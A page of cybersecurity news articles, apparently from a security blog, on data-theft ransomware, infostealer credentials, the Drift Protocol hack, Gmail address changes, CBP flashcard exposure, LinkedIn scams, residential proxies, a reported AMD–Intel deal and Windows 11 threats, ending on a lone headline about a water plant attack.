
Why Backups Alone Can No Longer Protect Against Modern Ransomware




For a long time, ransomware incidents have followed a predictable pattern. An organization’s systems are locked, critical files become inaccessible, operations slow down or stop entirely, and leadership must decide whether to recover data from backups or pay a ransom.

That pattern still exists today, but recent findings show that the threat has evolved into multiple forms.

A recent industry report based on hundreds of real-world incident response cases reveals that attackers are increasingly moving toward a different strategy. Instead of encrypting data, many are now stealing it and using it for extortion. These “data-only” attacks have increased sharply, rising from just 2 percent of cases to 22 percent within a year, representing an elevenfold jump.

This trend is also reflected in broader industry data. The Verizon 2025 Data Breach Investigations Report treats both encrypted and non-encrypted ransomware incidents as part of a single extortion category. According to its findings, ransomware was involved in 44 percent of the breaches it studied.


Why resilience needs to be redefined

These developments highlight a critical issue. Many organizations still treat ransomware mainly as a problem of restoring operations. Their focus is often on how quickly systems can be brought back online, whether backups are secure, and how much downtime can be managed.

While these factors remain relevant, they are no longer enough to address the full scope of risk.

When attackers shift their focus from disabling systems to stealing sensitive information, the situation changes completely. The priority is no longer just restoring access to systems. Instead, organizations must immediately understand what data has been taken, who owns it, and how sensitive it is.

This includes identifying whether the exposed information involves customer records, regulated datasets, intellectual property, or internal communications. It also requires knowing where that data was stored, whether in primary systems, cloud services, third-party platforms, or legacy storage that may have been retained unnecessarily.

If leadership teams cannot quickly answer these questions, restoring systems will not prevent further damage, including regulatory consequences, reputational harm, or legal exposure.


Data theft is becoming the main objective

Additional reporting reinforces this shift. Data from Coveware shows that in the second quarter of 2025, data exfiltration occurred in 74 percent of ransomware incidents. The company noted that in many cases, stealing data has become the central objective rather than just a step before encryption.

Attackers are no longer focused only on disruption. Instead, they are aiming to maximize pressure by using stolen data as leverage.


Encryption still exists, but its role is changing

This does not mean that encryption-based attacks have disappeared. Many ransomware operations still use a “double extortion” approach, where they both lock systems and steal data.

However, the key change is that data theft alone can now be enough to force payment. This reduces the effectiveness of relying solely on backups as a defense strategy.

Organizations such as the Cybersecurity and Infrastructure Security Agency continue to stress the importance of maintaining secure and offline backups that are regularly tested. At the same time, they warn that cloud-based backups can fail if compromised data is synchronized back into the system and overwrites clean versions.

This underlines a broader reality: restoring systems is only one part of true resilience.


Moving beyond a recovery-focused mindset

The cybersecurity industry is gradually adjusting to these changes. There is a growing emphasis on protecting and understanding data, rather than focusing only on system recovery.

This reflects a meaningful shift. Resilience is no longer just about recovering from an attack; it is about reducing uncertainty over data exposure before an incident occurs.

However, many organizations still measure their preparedness using disaster recovery metrics such as recovery time objectives and backup testing. Even service providers often frame ransomware readiness in these terms.

In a data-driven threat environment, a more meaningful measure of security maturity is whether an organization truly understands its data. This includes knowing where sensitive information is stored, how it moves across systems, who has access to it, and whether it needs to be retained.

Guidance from the National Institute of Standards and Technology supports this approach. Its Cybersecurity Framework 2.0 recommends maintaining detailed inventories of data, including its type, ownership, origin, and location. It also emphasizes lifecycle management, such as securely deleting unnecessary data and reducing redundant systems that increase exposure.
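An inventory of the kind NIST describes can be captured in a simple structured form. This is a minimal sketch: the fields follow the wording above (type, ownership, origin, location, retention), but the record layout, names, and retention check are illustrative, not part of the framework itself.

```python
from dataclasses import dataclass
from datetime import date

@dataclass
class DataAsset:
    """One entry in a data inventory, loosely following the CSF 2.0
    guidance: know each dataset's type, owner, origin, and location,
    plus whether it still needs to be retained at all."""
    name: str
    data_type: str      # e.g. "customer records", "intellectual property"
    owner: str          # accountable team or person
    origin: str         # system or process that produced it
    location: str       # primary system, cloud service, third party, legacy store
    retain_until: date  # past this date, the data is a liability, not an asset

def stale_assets(inventory: list[DataAsset], today: date) -> list[DataAsset]:
    """Flag data that should already have been deleted -- exactly the
    redundant exposure the lifecycle-management guidance warns about."""
    return [a for a in inventory if a.retain_until < today]

inventory = [
    DataAsset("crm-export", "customer records", "sales-ops",
              "CRM", "cloud bucket", date(2024, 1, 1)),
    DataAsset("design-docs", "intellectual property", "engineering",
              "wiki", "primary file server", date(2030, 1, 1)),
]
overdue = stale_assets(inventory, date(2026, 1, 1))
```

An inventory like this is what lets an incident response team answer "what was taken, who owns it, how sensitive is it" in hours rather than weeks.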

NIST’s incident response guidance further highlights that organizations with clear data inventories are better equipped to determine what information may have been affected during a breach.


The hidden risk of data sprawl

A major challenge for many organizations is uncontrolled data growth. Sensitive information is often copied across multiple platforms, including cloud storage, collaboration tools, shared drives, employee devices, and third-party services.

At the same time, outdated data is rarely deleted, often because responsibility for doing so is unclear. Access permissions also tend to expand over time without proper review.

As a result, organizations may appear prepared due to strong backup systems, while actually carrying significant hidden risk due to poorly managed data.


The bigger strategic lesson

The key takeaway is not that backups are unimportant. They remain a critical part of cybersecurity. However, they solve a different problem.

Backups help restore systems after disruption. They do not protect against the consequences of stolen data, such as loss of confidentiality, reputational damage, or reduced negotiating power during an extortion attempt.

To address modern threats, resilience must become more focused on data. This includes better classification of sensitive information, stronger access controls, improved visibility across cloud and third-party systems, and stricter data retention practices to reduce unnecessary exposure.

Organizations also need to communicate more clearly with leadership and stakeholders about the difference between operational recovery and true resilience.

Ultimately, the organizations best prepared for modern ransomware are not just those that can recover quickly, but those that already understand their data well enough to respond immediately.

In today’s environment, the gap between having backups and truly understanding data is where attackers gain their advantage.

Beyond Basic Monitoring: Why 2026 Demands Advanced Credential Defense

 

In today's cybersecurity landscape, stolen credentials represent a paramount threat, with infostealers harvesting 4.17 billion credentials in 2025 alone. A Lunar survey reveals that 85% of organizations view them as a high or very high risk, ranking them among the top three priorities for 62% of enterprises. Yet, many still rely on basic, checkbox-style monitoring tools that fail to address the evolving sophistication of attacks. 

Traditional breach monitoring focuses narrowly on publicized data breaches while overlooking infostealer logs, combolists, and underground marketplaces. These tools suffer from high latency, stale data, and a lack of automation or forensic detail such as compromised accounts, infected devices, or stolen session cookies. Only 32% of surveyed enterprises use dedicated solutions, while 17% have none, leaving critical blind spots. IBM reports that credential-related breaches cost an average of $4.81 to $4.88 million.

Modern infostealers like LummaC2 and AMOS bypass MFA and EDR by targeting active session tokens from unmanaged devices, enabling attackers to access accounts without passwords. Monthly checks cannot match the speed and scale of these threats, which evade detection through non-forensic data and URL-login-password (ULP) dumps sold on dark web forums. This "breach monitoring paradox" persists even among knowledgeable teams.

To counter this, organizations must adopt continuous, normalized monitoring across breaches, stealer logs, and dark web channels to build a deduplicated exposure view. Targeted automation reduces false positives by prioritizing high-risk identities and sessions. Integrating behavioral analysis and session integrity checks detects post-authentication anomalies. Cloud environments such as AWS highlight similar issues, where manual monitoring fails against dynamic changes and 24/7 threats.
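A "deduplicated exposure view" can be sketched by normalizing records from different feeds into one structure keyed by identity, keeping the most dangerous recent sighting per account. The field names and source labels below are illustrative assumptions, not any vendor's schema.

```python
from dataclasses import dataclass

@dataclass
class Exposure:
    email: str
    source: str        # "breach", "stealer_log", "combolist", ...
    seen: str          # ISO date of the sighting
    has_session: bool  # stolen session cookie present -> can bypass MFA

def dedupe(records: list[Exposure]) -> dict[str, Exposure]:
    """Collapse multiple sightings of the same identity into one entry.
    A live session token always outranks a bare password leak, since it
    lets an attacker skip authentication entirely; ties break to the
    newest sighting."""
    view: dict[str, Exposure] = {}
    for r in records:
        cur = view.get(r.email)
        if cur is None or (r.has_session, r.seen) > (cur.has_session, cur.seen):
            view[r.email] = r
    return view

records = [
    Exposure("alice@example.com", "combolist", "2025-03-01", False),
    Exposure("alice@example.com", "stealer_log", "2025-06-10", True),
    Exposure("bob@example.com", "breach", "2025-05-02", False),
]
view = dedupe(records)
```

The point of the ranking is triage: the stealer-log sighting with a live session, not the older combolist entry, is what the response team should act on first.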

Redefining breach monitoring as an ongoing program—beyond one-off products—delivers visibility, context, and automated playbooks. In 2026, with AI-powered attacks rising and detection times averaging 132 days, proactive strategies are essential. Enterprises ignoring this shift risk catastrophic losses amid infostealer proliferation.

Zoho Books Dispute Highlights Third-Party Payment Error Impacting FlexyPe Transactions

 

A conflict involving the fintech firm FlexyPe and the accounting platform Zoho has highlighted potential dangers when external tools connect to financial platforms. Problems emerged following inconsistencies found in FlexyPe's payment logs, which it first linked to flaws within Zoho Books. 

FlexyPe's Azeem Hussain disclosed that a manual review of financial records showed some failed transactions wrongly labeled as completed. Because of this mismatch, around ₹3.8 lakh was logged in Zoho Books as paid even though the money never arrived. While checking entries line by line, the team spotted the gap between system data and actual bank inflows, and the records have since been corrected to reflect what actually moved through the accounts.
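The line-by-line check described here amounts to a simple reconciliation between two records: what the books say was paid, and what the bank actually received. A minimal sketch, with hypothetical transaction IDs and amounts (nothing below comes from FlexyPe's or Zoho's actual systems):

```python
def reconcile(ledger: dict[str, float], bank: dict[str, float]) -> dict:
    """Compare transactions marked 'paid' in the books against actual
    bank credits. Returns ledger entries missing from the bank feed,
    any amount mismatches, and the total unaccounted shortfall."""
    missing = {txn: amt for txn, amt in ledger.items() if txn not in bank}
    mismatched = {txn: (amt, bank[txn])
                  for txn, amt in ledger.items()
                  if txn in bank and abs(amt - bank[txn]) > 0.005}
    return {"missing": missing,
            "mismatched": mismatched,
            "shortfall": sum(missing.values())}

# Hypothetical data: TXN-2 was marked paid but never settled.
ledger = {"TXN-1": 50_000.0, "TXN-2": 120_000.0, "TXN-3": 210_000.0}
bank   = {"TXN-1": 50_000.0, "TXN-3": 209_000.0}
report = reconcile(ledger, bank)
```

Run periodically against a bank statement feed, a check like this surfaces gateway-side status errors in days rather than months.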

According to Hussain, the bank received nothing even though Zoho Books showed the payments as settled, and he questioned how many months the discrepancy had gone undetected. Because the company processes a large volume of transactions every day, it is now auditing its finances in depth, tracing back twenty-four months to uncover any further mismatches. Zoho, however, pushed back hard against the allegations, insisting the fault lay elsewhere.

Its official statement pointed to a different source: the problem did not originate inside Zoho's own systems. Instead, it began when Cashfree Payments, the external payment processor, marked failed payment attempts as complete, feeding faulty data into FlexyPe's records and producing discrepancies where the numbers should have balanced. Zoho noted that its staff helped FlexyPe trace the root cause, and pointed to Cashfree's public admission of the flaw.

Zoho also called FlexyPe's decision to air the accusations online premature, since the inquiry was not yet finished. The company views those statements as inaccurate and has indicated that legal steps may follow, raising questions about the early release of unverified details. Cashfree Payments acknowledged the matter, stating it had found the problem within its own system and was moving forward with corrective steps.

A short-term fix went live to keep FlexyPe running smoothly while a lasting solution is built. Even after these explanations, Hussain is preparing legal action to recover the money lost in the incident. The episode underscores why careful record reconciliation matters, especially when third-party software plays a key role in handling finances: as companies depend more on interconnected systems, small integration errors can trigger serious operational and financial problems.

North Korean Group Allegedly Orchestrates $270M Drift Protocol Hack After Months-Long Infiltration

 

A sophisticated intelligence campaign spanning six months reportedly led to the $270 million breach of Drift Protocol, with investigators linking the operation to a North Korean state-backed threat group. The details were revealed in an incident update shared by the protocol’s team on Sunday.

According to the report, the attackers initiated contact in fall 2025 during a prominent cryptocurrency conference. They posed as representatives of a quantitative trading firm interested in integrating with Drift. The group demonstrated strong technical expertise, credible professional histories, and a deep understanding of the platform’s functionality. Communication soon moved to a Telegram group, where discussions over trading strategies and vault integrations continued for months—mirroring typical onboarding processes for DeFi trading firms.

Between December 2025 and January 2026, the group successfully onboarded an Ecosystem Vault, participated in multiple collaborative sessions, invested more than $1 million of their own funds, and established a seemingly legitimate operational role within the ecosystem.

Drift contributors also met members of the group in person at several major global industry events through February and March. By the time the exploit occurred on April 1, the relationship had developed over nearly half a year.

Investigators believe the breach stemmed from two primary attack vectors.

One of these involved a malicious TestFlight application—Apple’s platform for distributing pre-release apps outside the App Store’s standard review process—which the attackers presented as their wallet solution.

The second vector exploited a known vulnerability in widely used development tools VSCode and Cursor. Security researchers had flagged this issue since late 2025, noting that simply opening a file or folder could trigger silent execution of malicious code without any warning.

After gaining access to contributor devices, the attackers were able to secure the required approvals for a multisig transaction. These pre-authorized transactions remained inactive for over a week before being executed on April 1, allowing the attackers to siphon $270 million from Drift’s vaults in less than a minute.
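The week-plus gap between approval and execution is itself a detectable signal. As a minimal sketch, a protocol team could flag fully-approved multisig transactions that sit unexecuted past a threshold; the transaction fields and ages below are hypothetical and not tied to any specific multisig implementation or to Drift's actual setup.

```python
from datetime import datetime, timedelta

def stale_approvals(pending: list[dict], now: datetime,
                    max_age: timedelta = timedelta(days=1)) -> list[dict]:
    """Flag fully-approved multisig transactions that have sat
    unexecuted longer than max_age. A dormant, pre-authorized
    transaction is dangerous if any signer's device was compromised."""
    return [tx for tx in pending
            if tx["approvals"] >= tx["threshold"]
            and now - tx["approved_at"] > max_age]

# Hypothetical queue: tx-1 has been fully approved for nine days.
pending = [
    {"id": "tx-1", "approvals": 3, "threshold": 3,
     "approved_at": datetime(2026, 3, 23)},
    {"id": "tx-2", "approvals": 1, "threshold": 3,
     "approved_at": datetime(2026, 3, 30)},
]
flagged = stale_approvals(pending, now=datetime(2026, 4, 1))
```

An alert on such stale approvals, combined with a policy of expiring unexecuted transactions, narrows the window this attack depended on.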

The attack has been attributed to UNC4736, a group associated with North Korea and also known as AppleJeus or Citrine Sleet. This conclusion is based on blockchain transaction trails linked to previous Radiant Capital attacks, as well as similarities in operational tactics tied to known DPRK-linked actors.

Interestingly, individuals who attended conferences and interacted in person were not North Korean nationals. Experts note that such groups often deploy intermediaries with carefully crafted identities, complete with credible employment records and professional networks designed to pass scrutiny.

In response, Drift has advised other DeFi protocols to reassess their security frameworks, particularly access controls. The team emphasized that any device involved in multisig governance should be treated as a potential point of compromise.

The incident raises broader concerns for the industry. Multisig systems are widely relied upon as a core security mechanism, but this case highlights their limitations. If attackers are prepared to invest months, significant capital, and real-world interactions to build trust within a platform, it challenges the effectiveness of existing security models in detecting such deeply embedded threats.

Gmail Address Change Feature Fails to Address Core Security Risks, Report Warns

 

A recent update by Google allowing users to change their Gmail address has drawn attention, but cybersecurity experts say it does little to solve deeper issues tied to email privacy and security. 

The feature, which has gained visibility following its rollout in the United States, lets users modify their primary Gmail address while keeping the old one active as an alias. 

The change has been framed as a way to move beyond outdated or inappropriate usernames created years ago. Google CEO Sundar Pichai highlighted the shift in a public post, noting that users no longer need to be tied to early-era email identities. 

However, experts say the update does not address the main problem facing email users today: the widespread exposure of email addresses to marketers, data brokers, and cybercriminals.

Once an email address is used online, it is likely to be stored across multiple databases, making it a long-term target for spam and phishing attempts. Changing the visible username does not remove that exposure, especially since older addresses continue to function. 

Jake Moore, a cybersecurity specialist at ESET, said the ability to edit email addresses reflects a broader shift in how digital identity works, but warned it could introduce new risks. “Old addresses will still work as aliases,” he said, adding that this could increase the risk of impersonation and phishing attacks. 

Security researchers also point to the absence of a built-in privacy feature similar to Apple’s “Hide My Email,” which allows users to generate disposable email addresses for sign-ups and online transactions. These temporary addresses can be disabled at any time, limiting long-term exposure. 

Without a comparable system, Gmail users who change their address may still need to share their primary email widely, continuing the cycle of data exposure. 

The update may also create new vulnerabilities in the short term. Cybersecurity reports indicate that attackers are already using the feature as a lure in phishing campaigns, sending emails that direct users to fake login pages designed to steal account credentials. 

There are also early signs of increased spam activity. Online forums have reported a rise in unwanted emails, with some researchers suggesting the address change feature could allow attackers to bypass existing spam filters and start fresh. 

According to security researchers cited by industry outlets, many email filtering systems rely heavily on known sender addresses. 

If attackers rotate or modify those addresses, they may temporarily evade detection until new filters are applied. At the same time, changing a Gmail address does not stop unwanted messages from reaching the original account, since it remains active in the background. 

Experts say the update highlights a broader issue in email security. While giving users more flexibility over their identity, it does not reduce reliance on a single, permanent address that is repeatedly shared across services. 

They suggest that more effective solutions would include tools that limit how widely a primary email address is distributed, along with stronger controls over incoming messages. 

For now, users are being advised to treat emails related to the new feature with caution, particularly those that include links to account settings, as these may be part of phishing attempts.

Why Restarting Your Smartphone Daily Can Improve Security and Reduce Cyber Risks

 

A daily routine most people overlook could strengthen phone security in ways rarely considered. Spurred by recent comments from Anthony Albanese, the practice of briefly turning off mobile devices each day is gaining attention among experts. A complete shutdown, however short, disrupts potential intrusions before they take hold: a restart clears temporary weaknesses, cuts connection threads attackers might be exploiting unnoticed, and gives software a chance to shed lingering vulnerabilities. The habit costs nothing, yet builds resilience through repetition.

Though some dismiss it as old-fashioned, rebooting a device still holds value against modern digital threats. Security specialist Priyadarsi Nanda points out that a restart interrupts harmful background activity on both Apple's and Google's platforms, weakening active exploits and clearing short-lived glitches in the system. Even an app that appears inactive may still be running unseen tasks behind the scenes.

In some cases, attackers take advantage of these lingering processes to stay connected to the device. A fresh start shuts down every program and background helper at once, breaking the chains such activity relies on. The practice has backing from the National Security Agency, which suggests turning a phone off and on several times a week to reduce exposure, not just to scams aimed at stealing data but to complex intrusions as well. Even seemingly harmless app downloads can hide phishing traps aimed at stealing access.

More advanced methods, such as zero-click attacks, take control without any taps or clicks, often exploiting hidden flaws in messaging platforms. A reboot will not wipe out every trace of such stealthy code, but it can break its hold temporarily. Specialists stress that rebooting alone will not fully secure a device; it is one part of wider protection that also means applying patches, steering clear of questionable websites, and relying on verified software.

People who manage confidential information may need extra measures beyond these basics. Still, rebooting a phone now and then helps guard against shifting digital threats, and doing so each night before sleep cuts potential vulnerabilities without demanding much effort.

Public Quizlet Flashcards Raise Concerns Over Possible CBP Security Exposure

 



A set of publicly available flashcards discovered through simple online searches has sparked concern after appearing to reveal sensitive details related to facility security at U.S. Customs and Border Protection locations in Kingsville, Texas.

The flashcards were hosted on Quizlet and compiled under the title “USBP Review” in February. They remained accessible until March 20, when the set was made private shortly after an inquiry was sent to a phone number potentially linked to the account. Although the listed user appeared to be located near a CBP facility, there is no confirmation that the content was created by an active employee or contractor.

CBP has stated that its Office of Professional Responsibility is reviewing the matter, emphasizing that such reviews are routine and do not automatically indicate misconduct. Other agencies under the Department of Homeland Security, including Immigration and Customs Enforcement, did not respond to requests for comment.

If the material is found to be linked to CBP personnel, it could signal a serious lapse for an agency tasked with protecting national borders and safeguarding the country.

The flashcards included what appeared to be access codes for checkpoint doors and specific facility gates, with exact numerical combinations provided in response to direct prompts. Some gate names were not disclosed in reporting due to uncertainty over their confidentiality. Additional entries outlined immigration-related violations such as passport misuse, visa fraud, and attempts to evade checkpoints, along with associated legal consequences.

Several cards also detailed procedural workflows, including voluntary return processes, expedited removals, and warrants of removal. These entries referenced required documentation and reminded users to verify accuracy using an internal “agents Resources Page.”

Quizlet stated that it takes reports of sensitive content seriously and removes material that violates its policies, encouraging users to report concerning sets for review.

Further content within the set described the Kingsville sector’s operational scope, covering approximately 1,932 square miles across six counties. It also explained internal grid and zone systems, noting that one grid designation does not exist due to the layout of regional highways.

The flashcards additionally identified 11 operational towers in the area, including abbreviated naming formats and shared jurisdiction between certain towers. Some of these references appeared to align with the previously mentioned gate locations, increasing the potential sensitivity.

Another entry described an internal system called “E3 BEST,” which enables officers to record, investigate, and process secondary inspection cases. The system allows simultaneous database checks on individuals and vehicles and supports the creation of event records tied to enforcement outcomes.

The incident comes at a time of accelerated hiring across border enforcement agencies. CBP has offered incentives of up to $60,000 to attract recruits, while ICE has promoted similar packages, including signing bonuses and student loan repayment support. Increased recruitment may expand the use of informal study tools, raising the risk of unintended exposure.

Additional searches also surfaced other flashcard sets potentially linked to DHS-related training. These included materials on detention standards and transportation procedures, with prompts such as detainees being transported in a “safe and humane manner” and rules stating that driving under the influence is prohibited. Another set appeared to contain answers to internal training questions, including multiple-choice responses such as “Both A and C” and “All of the above.”

One user created more than 60 flashcard sets between November 2025 and February 2026, covering topics from radio codes and alphabets to more advanced areas like body-worn camera policies and immigration-related Spanish vocabulary. A more recent set included terms resembling language used in recruitment messaging, such as “the nation,” “the security,” and “the homeland.”

From a broader security perspective, the incident highlights how publicly accessible platforms can unintentionally expose operational knowledge. While no confirmed misuse has been reported, the situation underlines the importance of controlling how internal training materials are created, shared, and stored, particularly within agencies responsible for national security.

How to Spot and Avoid LinkedIn Scams: A Complete Guide to Staying Safe Online

 

Most people trust LinkedIn for connecting careers, finding jobs, or growing businesses - yet that very trust opens doors for fraudsters. Because profiles often reveal detailed backgrounds, attackers pull facts straight from bios to craft believable tricks. Spotting odd requests or sudden offers helps block risks before they grow. Awareness matters, especially when messages seem too eager or oddly timed. 

Most people come across false job listings on LinkedIn at some point. Fake recruiter accounts tend to advertise positions offering large salaries, little work, fast placement, or overseas relocation. These deals often turn sour once applicants are asked for private details or required to cover costs such as setup fees, training modules, or equipment. Another frequent method relies on deceptive messages that mimic real notifications from the platform and contain harmful links designed to capture account passwords and access codes.

One way attackers operate now involves tailored tactics, including spear-phishing. Studying someone's online activity helps them design messages appearing genuine and familiar. Sometimes these interactions shift from LinkedIn to apps such as WhatsApp or Telegram, avoiding detection more easily. Moving communication elsewhere raises serious concerns - it typically precedes deeper manipulation. Another trend gaining ground includes scams based on fake investments or romantic connections; here, confidence grows slowly until false money offers appear, frequently tied to digital currency. Watch out for certain red flags when using professional platforms. 

When messages push you to act fast, promise big rewards, or ask for private data, stay cautious. A profile with few contacts, a missing background, or odd job timelines might not be genuine. Confirm who you are dealing with by checking corporate websites, a basic step that often gets ignored. Protecting your online presence begins with straightforward habits: click only trusted links, enable two-step login for an extra layer of safety, and use strong, unique passwords, since reuse weakens protection.

Staying inside LinkedIn messages helps keep exchanges secure. Sharing less personal detail lowers exposure quietly. Privacy controls fine-tune who sees what - adjust them often. Safety grows when small steps add up behind the scenes. Right away, cut contact if something feels off - then alert LinkedIn about the account. 

When financial data might be exposed, changing passwords fast becomes key, while also warning your bank without delay. Even as the platform expands, threats rise at the same pace, which means staying alert matters more than any tool. Awareness acts quietly but powerfully, standing between safety and harm.

Residential Proxies Evade IP Reputation Checks in 78% of 4 Billion Sessions

 

Residential proxy networks are now evading IP‑reputation‑based security controls in a majority of malicious sessions, greatly undercutting a core pillar of network defense. A recent analysis by cybersecurity intelligence firm GreyNoise found that residential‑proxy‑routed traffic escaped IP‑reputation checks in 78% of roughly 4 billion malicious sessions over a three‑month window. Attackers rely on ordinary home and mobile‑network IP addresses passed through these proxies, making it hard for defenders to distinguish malicious scans from legitimate user traffic.

How residential proxies work 

Residential proxies route traffic through real‑world consumer devices—home routers, mobile phones, and small‑business connections—owned by ordinary users or enrolled into third‑party bandwidth‑sharing schemes. Many of these IPs are short‑lived, appearing only once or twice in attacker logs before being rotated, which prevents reputation feeds from cataloging them in time. About 89.7% of the residential IPs involved in attacks are active for under a month, with only small fractions persisting beyond two or three months.

The main problem is that IP reputation typically tags long‑running or heavily abused addresses, yet most residential proxy IPs are highly transient and geographically scattered. GreyNoise’s data shows the attacking residential IPs come from 683 different ISPs, blending with normal customer traffic and diluting any clear “bad‑IP” signal. Because attackers mainly use these proxies for low‑volume network scanning and reconnaissance instead of direct exploits, traffic patterns look benign at the network layer, letting 78% of such sessions slip past reputation‑based filters.

The study points to China, India, and Brazil as major sources of residential‑proxy traffic, with usage patterns that mirror human behavior, such as a noticeable drop in activity at night. GreyNoise identifies two main ecosystems behind these proxies: IoT botnets and compromised consumer devices whose installed software—such as free VPNs and ad‑blocking apps—secretly sells the device’s bandwidth. SDKs embedded in these apps enroll consenting or unaware users into proxy networks that monetize idle home‑network capacity.

Implications and future defenses 

The high evasion rate means relying solely on IP reputation is no longer sufficient for detecting threats routed through residential proxies. GreyNoise recommends shifting toward behavior‑based detection, including tracking sequential probing from rotating residential IPs, blocking unsupported enterprise protocols from ISP‑facing networks, and persistently fingerprinting devices even when their IP changes. Security teams will need layered analytics—combining session‑level behavior, device profiles, and protocol anomalies—to stay effective as attackers continue to exploit the camouflage of residential‑proxy infrastructure.
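The behavior-based approach GreyNoise recommends keys detection to a persistent device fingerprint rather than the rotating IP. As a minimal sketch under that assumption, probe events can be grouped by fingerprint so a scanner accumulates one behavioral history across all the residential IPs it rotates through; the event fields, fingerprint values, and threshold below are illustrative.

```python
from collections import defaultdict

def sequential_probers(events: list[dict], min_ports: int = 5) -> set[str]:
    """Group probe events by device fingerprint instead of source IP,
    so a scanner rotating through residential proxies still builds up
    one history. Flag fingerprints that touch many distinct ports,
    regardless of how many IPs they appeared from."""
    ports_by_fp: dict[str, set[int]] = defaultdict(set)
    for e in events:
        ports_by_fp[e["fingerprint"]].add(e["port"])
    return {fp for fp, ports in ports_by_fp.items() if len(ports) >= min_ports}

# Hypothetical traffic: one scanner behind five rotating residential IPs,
# plus one ordinary client making a single connection.
events = [{"fingerprint": "dev-A", "ip": f"203.0.113.{i}", "port": 1000 + i}
          for i in range(5)]
events.append({"fingerprint": "dev-B", "ip": "198.51.100.7", "port": 443})
flagged = sequential_probers(events)
```

Per-IP reputation would see five unrelated low-volume addresses here; the fingerprint view sees a single device performing a sequential scan.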

AMD Announces Plan to Acquire Intel in Unprecedented Industry Turn

 

Advanced Micro Devices has revealed plans to acquire long-time rival Intel Corporation, marking a dramatic reversal in one of the most enduring rivalries in the semiconductor industry.

The proposed transaction, structured entirely as a stock-based deal, signals a major shift in industry power. Once viewed as the underdog, AMD has now surpassed Intel in market valuation, and the acquisition would further cement that transition.

For over four decades, the relationship between the two companies has been defined by competition, imitation, legal disputes, and strategic overlap. AMD historically operated in Intel’s shadow, often positioning itself as a secondary supplier while attempting to challenge its dominance. In recent years, however, AMD has strengthened its position across multiple computing segments and improved investor confidence, while Intel has faced setbacks.

Intel’s struggles have included delays in manufacturing advancements, inconsistent product execution, and repeated strategic adjustments. These challenges have contributed to a broader shift in market perception, allowing AMD to close the gap and eventually move ahead in key areas.

The idea of AMD acquiring Intel would have seemed highly unlikely just a few years ago, given Intel’s long-standing dominance as the central force in the personal computing ecosystem. The potential merger now reflects how drastically that balance has changed.

If completed, integrating the two companies could present organizational and cultural challenges, given their long history as direct competitors. Leadership from AMD indicated that the combined entity could accelerate product development timelines, streamline user experience, and maintain a level of internal competition despite operating under one structure.

In its response, Intel stated that the agreement could enhance shareholder value while providing its engineering teams with clearer direction and stronger operational support to rebuild competitive product offerings.

Industry analysts are still assessing the broader implications. Historically, Intel’s scale and manufacturing capabilities positioned it at the center of the computing market, while AMD functioned as a challenger that introduced competitive pressure. That dynamic has shifted as AMD expanded its presence in servers, desktops, and mobile computing, while Intel’s recovery efforts remain ongoing.

Several practical questions remain unresolved. These include how branding will be handled, whether both product lines will continue independently, and how regulators will evaluate the consolidation of two primary x86 architecture competitors under a single entity.

Sources familiar with the matter suggest AMD may adopt a structure that retains both brands in the near term. One internal concept reportedly frames Intel as a legacy-focused division, reflecting its historical significance while redefining its position within the organization.

Investor reaction has ranged from surprise to cautious optimism. Some market participants see the potential for operational efficiency and reduced rivalry, while others are concerned that combining the two companies could limit competition in the x86 processor market.

From a regulatory perspective, the deal is likely to face scrutiny due to the potential concentration of market power. The long-standing competition between AMD and Intel has historically driven innovation and pricing balance, and its reduction could reshape industry dynamics.

The announcement comes at a time when the semiconductor sector is undergoing rapid transformation, driven by demand for artificial intelligence, high-performance computing, and evolving global supply chains. Both companies have been investing heavily in these areas, alongside competitors such as NVIDIA Corporation.

At present, the timeline for completion remains subject to regulatory approvals and further review. While the companies have indicated confidence in moving forward, the scale and implications of the deal mean that its outcome will be closely watched across the industry.

Windows 11 Faces Rising Threats from AI Malware and Critical Security Flaws

 

Pressure on Windows 11 security is growing, driven by emerging AI-powered malware and unpatched flaws that threaten companies and everyday users alike. Recent incidents, especially within large organizational networks, show how fast the threat landscape is shifting. At the center of current concern is DeepLoad, a threat that skips typical download tactics altogether.

Instead of dropping files to disk, it operates without any, earning its "fileless" label. Users themselves become part of the breach: following deceptive prompts, they run benign-looking instructions in system utilities such as Command Prompt. Once executed, those inputs quietly trigger malicious activity behind the scenes. Because nothing is written to disk, standard virus scanners often miss what is happening.

Detection is difficult when there is no file footprint to flag. After running, the malware stays active by embedding itself into system processes while reaching out to remote servers through standard Windows tools. Because it targets confidential information such as passwords, it poses serious risks inside business environments. It is even harder to spot because it blends malicious activity with normal operating routines, so security teams may overlook it during routine checks.
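DeepLoad's exact indicators have not been published, but fileless threats that abuse built-in utilities are commonly caught by inspecting process command lines rather than files. A generic, illustrative sketch; the pattern list is a simplified assumption, not DeepLoad-specific intelligence:

```python
import re

# Illustrative "living off the land" command-line patterns; real endpoint
# products use far larger rule sets. This list is an assumption for the
# sketch only.
SUSPICIOUS_PATTERNS = [
    re.compile(r"powershell.*-enc(odedcommand)?\s", re.IGNORECASE),
    re.compile(r"mshta\s+https?://", re.IGNORECASE),
    re.compile(r"certutil.*-urlcache", re.IGNORECASE),
    re.compile(r"rundll32.*javascript:", re.IGNORECASE),
]

def is_suspicious_command(cmdline: str) -> bool:
    """Flag a process command line that matches a known abuse pattern.
    Fileless loaders leave nothing on disk to scan, so command-line
    telemetry is one of the few signals defenders still have."""
    return any(p.search(cmdline) for p in SUSPICIOUS_PATTERNS)
```

Checks like this run on process-creation telemetry, which is why the article's advice to log and review command-line activity matters even when antivirus scans come back clean.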

Artificial intelligence makes existing threats more dangerous. AI-driven malware adjusts on the fly, slipping past standard detection systems, and security tools struggle to keep up. With each change the malware makes, response times shrink; the gap between finding a flaw and facing an attack narrows by the hour. Meanwhile, Microsoft has rolled out security patches to fix numerous high-risk weaknesses.

The patches cover various business-focused builds of Windows 11, both recent iterations and extended-support variants. One major concern involves defects in the Routing and Remote Access Service (RRAS), where exploitation could let threat actors run harmful software remotely and gain full administrative access to compromised machines. The impact is not limited to isolated systems.

In the most recent Patch Tuesday, Microsoft fixed more than eighty security flaws across its products, including problems hiding inside tools such as Excel and Outlook. In some cases, opening an attachment was not even needed; merely previewing it could trigger harmful code, which shows how dangerous these weaknesses really are. Experts warn that even emerging AI tools, such as Microsoft Copilot, could introduce new risks if not properly secured, particularly when sensitive data is handled automatically.

Although companies face the most attacks, individuals can still be affected. Apply new patches without delay, since timing often matters more than assumed; avoid running unknown scripts, as many breaches begin there; and treat unexpected requests, especially those demanding immediate action, with extra skepticism.

The result is a new kind of digital danger: cleverer, stealthier, and built to exploit how people act as much as system flaws. One moment it mimics trust; the next, it slips through unnoticed.

Ransomware Attack Hits North Dakota Water Plant, Operations Shifted to Manual Monitoring

 

